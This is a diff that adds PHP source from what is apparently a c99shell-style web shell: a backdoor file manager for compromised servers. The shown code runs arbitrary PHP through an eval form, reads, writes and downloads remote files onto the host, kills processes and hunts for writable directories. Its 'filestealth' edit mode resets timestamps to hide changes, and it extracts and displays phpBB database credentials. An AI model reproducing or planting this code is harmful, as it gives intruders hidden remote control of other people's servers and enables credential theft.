+        elseif (is_dir($v)) {$objects["folders"][] = $row;}
+        elseif (is_file($v)) {$objects["files"][] = $row;}
+        $i++;
+      }
+      $row = array();
+      $row[] = "<b>Name</b>";
+      $row[] = "<b>Size</b>";
+      $row[] = "<b>Date Modified</b>";
+      if (!$win) {$row[] = "<b>Owner/Group</b>";}
+      $row[] = "<b>Perms</b>";
+      $row[] = "<b>Action</b>";
+      $parsesort = parsesort($sort);
+      $sort = $parsesort[0].$parsesort[1];
+      $k = $parsesort[0];
+      if ($parsesort[1] != "a") {$parsesort[1] = "d";}
+      $y = " <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
+      $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";
+      $row[$k] .= $y;
+      for($i=0;$i<count($row)-1;$i++) {
+        if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
+      }
+      $v = $parsesort[0];
+      usort($objects["folders"], "tabsort");
+      usort($objects["links"], "tabsort");
+      usort($objects["files"], "tabsort");
+      if ($parsesort[1] == "d") {
+        $objects["folders"] = array_reverse($objects["folders"]);
+        $objects["files"] = array_reverse($objects["files"]);
+      }
+      $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
+      $tab = array();
+      $tab["cols"] = array($row);
+      $tab["head"] = array();
+      $tab["folders"] = array();
+      $tab["links"] = array();
+      $tab["files"] = array();
+      $i = 0;
+      foreach ($objects as $a) {
+        $v = $a[0];
+        $o = basename($v);
+        $dir = dirname($v);
+        if ($disp_fullpath) {$disppath = $v;}
+        else {$disppath = $o;}
+        $disppath = str2mini($disppath,60);
+        if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+        elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+        foreach ($regxp_highlight as $r) {
+          if (ereg($r[0],$o)) {
+            if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();}
+            else {
+              $r[1] = round($r[1]);
+              $isdir = is_dir($v);
+              if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) {
+                if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
+                $disppath = $r[2].$disppath.$r[3];
+                if ($r[4]) {break;}
+              }
+            }
+          }
+        }
+        $uo = urlencode($o);
+        $ud = urlencode($dir);
+        $uv = urlencode($v);
+        $row = array();
+        if ($o == ".") {
+          $row[] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."act=img&img=small_dir\" border=\"0\">&nbsp;".$o."</a>";
+          $row[] = "CURDIR";
+        }
+        elseif ($o == "..") {
+          $row[] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."act=img&img=ext_lnk\" border=\"0\">&nbsp;".$o."</a>";
+          $row[] = "UPDIR";
+        }
+        elseif (is_dir($v)) {
+          if (is_link($v)) {
+            $disppath .= " => ".readlink($v);
+            $type = "LINK";
+            $row[] = "<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."act=img&img=ext_lnk\" border=\"0\">&nbsp;[".$disppath."]</a>";
+          }
+          else {
+            $type = "DIR";
+            $row[] =  "<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."act=img&img=small_dir\" border=\"0\">&nbsp;[".$disppath."]</a>";
+          }
+          $row[] = $type;
+        }
+        elseif(is_file($v)) {
+          $ext = explode(".",$o);
+          $c = count($ext)-1;
+          $ext = $ext[$c];
+          $ext = strtolower($ext);
+          $row[] =  "<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$disppath."</a>";
+          $row[] = view_size($a[1]);
+        }
+        $row[] = date("d.m.Y H:i:s",$a[2]);
+        if (!$win) {$row[] = $a[3];}
+        $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
+        if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
+        else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
+        if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" border=\"0\"></a>&nbsp;".$checkbox;}
+        else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" border=\"0\"></a>&nbsp;".$checkbox;}
+        if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
+        elseif (is_link($v)) {$tab["links"][] = $row;}
+        elseif (is_dir($v)) {$tab["folders"][] = $row;}
+        elseif (is_file($v)) {$tab["files"][] = $row;}
+        $i++;
+      }
+    }
+    // Compiling table
+    $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
+    echo "<div class=barheader>.: ";
+    if (!empty($fx_infohead)) { echo $fx_infohead; }
+    else { echo "Directory List (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders)"; }
+    echo " :.</div>\n";
+    echo "<form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=\"".$dspact."\"><input type=hidden name=d value=".$d.">".
+         "<table class=explorer>";
+    foreach($table as $row) {
+      echo "<tr>";
+      foreach($row as $v) {echo "<td>".$v."</td>";}
+      echo "</tr>\r\n";
+    }
+    echo "</table>".
+         "<script>".
+         "function ls_setcheckboxall(status) {".
+         " var id = 1; var num = ".(count($table)-2).";".
+         " while (id <= num) { document.getElementById('actbox'+id).checked = status; id++; }".
+         "}".
+         "function ls_reverse_all() {".
+         " var id = 1; var num = ".(count($table)-2).";".
+         " while (id <= num) { document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; id++; }".
+         "}".
+         "</script>".
+         "<div align=\"right\">".
+         "<input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">".
+         "<img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
+    if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) {
+      echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"fx_archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tgz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+    }
+    echo "<select name=act><option value=\"".$act."\">With selected:</option>";
+    echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
+    echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
+    if ($usefsbuff) {
+      echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
+      echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
+      echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
+    }
+    echo "</select>&nbsp;<input type=submit value=\"Confirm\"></div>";
+    echo "</form>";
+  }
+}
+if ($act == "tools") //Define Yourself
+{
+
+}
+if ($act == "phpfsys") {
+  echo "<div align=left>";
+  $fsfunc = $phpfsysfunc;
+  if ($fsfunc=="copy") {
+    if (!copy($arg1, $arg2)) { echo "Failed to copy $arg1...\n";}
+    else { echo "<b>Success!</b> $arg1 copied to $arg2\n"; }
+  }
+  elseif ($fsfunc=="rename") {
+    if (!rename($arg1, $arg2)) { echo "Failed to rename/move $arg1!\n";}
+    else { echo "<b>Success!</b> $arg1 renamed/moved to $arg2\n"; }
+  }
+  elseif ($fsfunc=="chmod") {
+    if (!chmod($arg1,$arg2)) { echo "Failed to chmod $arg1!\n";}
+    else { echo "<b>Perm for $arg1 changed to $arg2!</b>\n"; }
+  }
+  elseif ($fsfunc=="read") {
+    $hasil = @file_get_contents($arg1);
+    echo "<b>Filename:</b> $arg1<br>";
+    echo "<textarea cols=150 rows=20>";
+    echo $hasil;
+    echo "</textarea>\n";
+  }
+  elseif ($fsfunc=="write") {
+    if(@file_put_contents($d.$arg1,$arg2)) {
+      echo "<b>Saved!</b> ".$d.$arg1;
+    }
+    else { echo "<div class=fxerrmsg>Couldn't write to $arg1!</div>"; }
+  }
+  elseif ($fsfunc=="downloadbin") {
+    $handle = fopen($arg1, "rb");
+    $contents = '';
+    while (!feof($handle)) {
+      $contents .= fread($handle, 8192);
+    }
+    $r = @fopen($d.$arg2,'w');
+    if (fwrite($r,$contents)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; }
+    else { echo "<div class=fxerrmsg>Couldn't write to ".$d.$arg2."!</div>"; }
+    fclose($r);
+    fclose($handle);
+  }
+  elseif ($fsfunc=="download") {
+    $text = implode('', file($arg1));
+    if ($text) {
+      $r = @fopen($d.$arg2,'w');
+      if (fwrite($r,$text)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; }
+      else { echo "<div class=fxerrmsg>Couldn't write to ".$d.$arg2."!</div>"; }
+      fclose($r);
+    }
+    else { echo "<div class=fxerrmsg>Couldn't download from $arg1!</div>";}
+  }
+  elseif ($fsfunc=='mkdir') {
+    $thedir = $d.$arg1;
+    if ($thedir != $d) {
+      if (file_exists($thedir)) { echo "<b>Already exists:</b> ".htmlspecialchars($thedir); }
+      elseif (!mkdir($thedir)) { echo "<b>Access denied:</b> ".htmlspecialchars($thedir); }
+      else { echo "<b>Dir created:</b> ".htmlspecialchars($thedir);}
+    }
+    else { echo "Couldn't create current dir:<b> $thedir</b>"; }
+  }
+  elseif ($fsfunc=='fwritabledir') {
+    function recurse_dir($dir,$max_dir) {
+      global $dir_count;
+      $dir_count++;
+      if( $cdir = @dir($dir) ) {
+        while( $entry = $cdir-> read() ) {
+          if( $entry != '.' && $entry != '..' ) {
+            if(is_dir($dir.$entry) && is_writable($dir.$entry) ) {
+             if ($dir_count > $max_dir) { return; }
+              echo "[".$dir_count."] ".$dir.$entry."\n";
+              recurse_dir($dir.$entry.DIRECTORY_SEPARATOR,$max_dir);
+            }
+          }
+        }
+        $cdir->close();
+      }
+    }
+    if (!$arg1) { $arg1 = $d; }
+    if (!$arg2) { $arg2 = 10; }
+    echo "<b>Writable directories (Max: $arg2) in:</b> $arg1<br>";
+    echo "<pre>";
+    recurse_dir($arg1,$arg2);
+    echo "</pre>";
+    $total = $dir_count - 1;
+    echo "<b>Founds:</b> ".$total." of <b>Max</b> $arg2";
+  }
+  else {
+    if (!$arg1) { echo "<div class=fxerrmsg>No operation! Please fill parameter [A]!</div>\n"; }
+    else {
+      if ($hasil = $fsfunc($arg1)) {
+        echo "<b>Result of $fsfunc $arg1:</b><br>";
+        if (!is_array($hasil)) { echo "$hasil\n"; }
+        else {
+          echo "<pre>";
+          foreach ($hasil as $v) { echo $v."\n"; }
+          echo "</pre>";
+        }
+      }
+      else { echo "<div class=fxerrmsg>$fsfunc $arg1 failed!</div>\n"; }
+    }
+  }
+  echo "</div>\n";
+}
+if ($act == "processes") {
+  echo "<div class=barheader>.: Processes :.</div>";
+  if (!$win) { $handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":""); }
+  else { $handler = "tasklist"; }
+  $ret = myshellexec($handler);
+  if (!$ret) { echo "Can't execute \"".$handler."\"!"; }
+  else {
+    if (empty($processes_sort)) {$processes_sort = $sort_default;}
+    $parsesort = parsesort($processes_sort);
+    if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
+    $k = $parsesort[0];
+    if ($parsesort[1] != "a") {
+      $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" border=\"0\"></a>";
+    }
+    else {
+      $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";
+    }
+    $ret = htmlspecialchars($ret);
+    if (!$win) {
+      if ($pid) {
+        if (is_null($sig)) {$sig = 9;}
+        echo "Sending signal ".$sig." to #".$pid."... ";
+        if (posix_kill($pid,$sig)) {echo "OK.";}
+        else {echo "ERROR.";}
+      }
+      while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+      $stack = explode("\n",$ret);
+      $head = explode(" ",$stack[0]);
+      unset($stack[0]);
+      for($i=0;$i<count($head);$i++) {
+        if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
+      }
+      $prcs = array();
+      foreach ($stack as $line) {
+        if (!empty($line)) {
+          echo "<tr>";
+          $line = explode(" ",$line);
+          $line[10] = join(" ",array_slice($line,10));
+          $line = array_slice($line,0,11);
+          if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
+          $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+          $prcs[] = $line;
+          echo "</tr>";
+        }
+      }
+    }
+    //For Windows - Fixed By dhie-Q
+    else {
+      while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+      while (ereg("=",$ret)) {$ret = str_replace("=","",$ret);}
+      $ret = convert_cyr_string($ret,"d","w");
+      $stack = explode("\n",$ret);
+      unset($stack[0],$stack[2]);
+      $stack = array_values($stack);
+      $stack[0]=str_replace("Image Name","ImageName",$stack[0]);
+      $stack[0]=str_replace("Session Name","SessionName",$stack[0]);
+      $stack[0]=str_replace("Mem Usage","MemoryUsage",$stack[0]);
+      $head = explode(" ",$stack[0]);
+      $stack = array_slice($stack,1);
+      $head = array_values($head);
+      if ($parsesort[1] != "a") { $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" border=\"0\"></a>"; }
+      else { $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" border=\"0\"></a>"; }
+      if ($k > count($head)) {$k = count($head)-1;}
+      for($i=0;$i<count($head);$i++) {
+        if ($i != $k) { $head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>"; }
+      }
+      $prcs = array();
+      unset($stack[0]);
+      foreach ($stack as $line) {
+        if (!empty($line)) {
+          $line = explode(" ",$line);
+          $line[4] = str_replace(".","",$line[4]);
+          $line[4] = intval($line[4]) * 1024;
+          unset($line[5]);
+          $prcs[] = $line;
+        }
+      }
+    }
+    $head[$k] = "<b>".$head[$k]."</b>".$y;
+    $v = $processes_sort[0];
+    usort($prcs,"tabsort");
+    if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
+    $tab = array();
+    $tab[] = $head;
+    $tab = array_merge($tab,$prcs);
+    echo "<table class=explorer>";
+    foreach($tab as $i=>$k) {
+      echo "<tr>";
+      foreach($k as $j=>$v) {
+        if ($win and $i > 0 and $j == 4) {$v = view_size($v);}
+        echo "<td>".$v."</td>";
+      }
+      echo "</tr>";
+    }
+    echo "</table>";
+  }
+}
+if ($act == "eval") {
+  if (!empty($eval)) {
+    echo "Result of execution this PHP-code:<br>";
+    $tmp = ob_get_contents();
+    $olddir = realpath(".");
+    @chdir($d);
+    if ($tmp) {
+      ob_clean();
+      eval($eval);
+      $ret = ob_get_contents();
+      $ret = convert_cyr_string($ret,"d","w");
+      ob_clean();
+      echo $tmp;
+      if ($eval_txt) {
+        $rows = count(explode("\r\n",$ret))+1;
+        if ($rows < 10) {$rows = 10;}
+        echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+      }
+      else {echo $ret."<br>";}
+    }
+    else {
+      if ($eval_txt) {
+        echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+        eval($eval);
+        echo "</textarea>";
+      }
+      else {echo $ret;}
+    }
+    @chdir($olddir);
+  }
+  else {echo "<b>PHP-code Execution (Use without PHP Braces!)</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
+  echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f") {
+  echo "<div align=left>";
+  if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") {
+    if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+    else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+  }
+  else {
+    $r = @file_get_contents($d.$f);
+    $ext = explode(".",$f);
+    $c = count($ext)-1;
+    $ext = $ext[$c];
+    $ext = strtolower($ext);
+    $rft = "";
+    foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
+    if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+    if (empty($ft)) {$ft = $rft;}
+    $arr = array(
+        array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
+        array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
+        array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
+        array("Code","code"),
+        array("Session","phpsess"),
+        array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
+        array("SDB","sdb"),
+        array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
+        array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
+        array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
+        array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
+        array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
+    );
+    echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
+    foreach($arr as $t) {
+      if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
+      elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+      else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
+      echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+    }
+    echo "<hr size=\"1\" noshade>";
+    if ($ft == "info") {
+      echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+      if (!$win) {
+        echo "<tr><td><b>Owner/Group</b></td><td> ";
+        $ow = posix_getpwuid(fileowner($d.$f));
+        $gr = posix_getgrgid(filegroup($d.$f));
+        echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
+      }
+      echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table>";
+      $fi = fopen($d.$f,"rb");
+      if ($fi) {
+        if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
+        else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
+        $n = 0;
+        $a0 = "00000000<br>";
+        $a1 = "";
+        $a2 = "";
+        for ($i=0; $i<strlen($str); $i++) {
+          $a1 .= sprintf("%02X",ord($str[$i]))." ";
+          switch (ord($str[$i])) {
+            case 0:  $a2 .= "<font>0</font>"; break;
+            case 32:
+            case 10:
+            case 13: $a2 .= "&nbsp;"; break;
+            default: $a2 .= htmlspecialchars($str[$i]);
+          }
+          $n++;
+          if ($n == $hexdump_rows) {
+            $n = 0;
+            if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
+            $a1 .= "<br>";
+            $a2 .= "<br>";
+          }
+        }
+        echo "<table border=1 bgcolor=#666666>".
+             "<tr><td bgcolor=#666666>".$a0."</td>".
+             "<td bgcolor=#000000>".$a1."</td>".
+             "<td bgcolor=#000000>".$a2."</td>".
+             "</tr></table><br>";
+      }
+      $encoded = "";
+      if ($base64 == 1) {
+        echo "<b>Base64 Encode</b><br>";
+        $encoded = base64_encode(file_get_contents($d.$f));
+      }
+      elseif($base64 == 2) {
+        echo "<b>Base64 Encode + Chunk</b><br>";
+        $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
+      }
+      elseif($base64 == 3) {
+        echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+        $encoded = base64_encode(file_get_contents($d.$f));
+        $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+      }
+      elseif($base64 == 4) {
+        $text = file_get_contents($d.$f);
+        $encoded = base64_decode($text);
+        echo "<b>Base64 Decode";
+    if (base64_encode($encoded) != $text) {echo " (failed)";}
+    echo "</b><br>";
+   }
+   if (!empty($encoded))
+   {
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+   }
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+        <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+        <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+        <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+        <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+        <P>";
+  }
+  elseif ($ft == "html") {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {c99shexit();}
+  }
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
+  elseif ($ft == "phpsess") {
+   echo "<pre>";
+   $v = explode("|",$r);
+   echo $v[0]."<br>";
+   var_dump(unserialize($v[1]));
+   echo "</pre>";
+  }
+  elseif ($ft == "exe") {
+   $ext = explode(".",$f);
+   $c = count($ext)-1;
+   $ext = $ext[$c];
+   $ext = strtolower($ext);
+   $rft = "";
+   foreach($exeftypes as $k=>$v)
+   {
+    if (in_array($ext,$v)) {$rft = $k; break;}
+   }
+   $cmd = str_replace("%f%",$f,$rft);
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
+  }
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
+  elseif ($ft == "code") {
+    if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) {
+      $arr = explode("\n",$r);
+      if (count($arr == 18)) {
+        include($d.$f);
+        echo "<b>phpBB configuration is detected in this file!<br>";
+        if ($dbms == "mysql4") {$dbms = "mysql";}
+        if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+        else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by ".$sh_name.". Please, report us for fix.";}
+        echo "Parameters for manual connect:<br>";
+        $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
+        foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+        echo "</b><hr size=\"1\" noshade>";
+      }
+    }
+    echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
+    if (!empty($white)) {@ob_clean();}
+    highlight_file($d.$f);
+    if (!empty($white)) {c99shexit();}
+    echo "</div>";
+  }
+  elseif ($ft == "download") {
+    @ob_clean();
+    header("Content-type: application/octet-stream");
+    header("Content-length: ".filesize($d.$f));
+    header("Content-disposition: attachment; filename=\"".$f."\";");
+    echo $r;
+    exit;
+  }
+  elseif ($ft == "notepad") {
+    @ob_clean();
+    header("Content-type: text/plain");
+    header("Content-disposition: attachment; filename=\"".$f.".txt\";");
+    echo($r);
+    exit;
+  }
+  elseif ($ft == "img") {
+    $inf = getimagesize($d.$f);
+    if (!$white) {
+      if (empty($imgsize)) {$imgsize = 20;}
+      $width = $inf[0]/100*$imgsize;
+      $height = $inf[1]/100*$imgsize;
+      echo "<center><b>Size:</b>&nbsp;";
+      $sizes = array("100","50","20");
+      foreach ($sizes as $v) {
+        echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
+        if ($imgsize != $v ) {echo $v;}
+        else {echo "<u>".$v."</u>";}
+        echo "</a>&nbsp;&nbsp;&nbsp;";
+      }
+      echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
+    }
+    else {
+      @ob_clean();
+      $ext = explode($f,".");
+      $ext = $ext[count($ext)-1];
+      header("Content-type: ".$inf["mime"]);
+      readfile($d.$f);
+      exit;
+    }
+  }
+  elseif ($ft == "edit") {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "<b>Can't write to file!</b>";}
+    else
+    {
+     echo "<b>Saved!</b>";
+     fwrite($fp,$edit_text);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $edit_text;
+    }
+   }
+   $rows = count(explode("\r\n",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
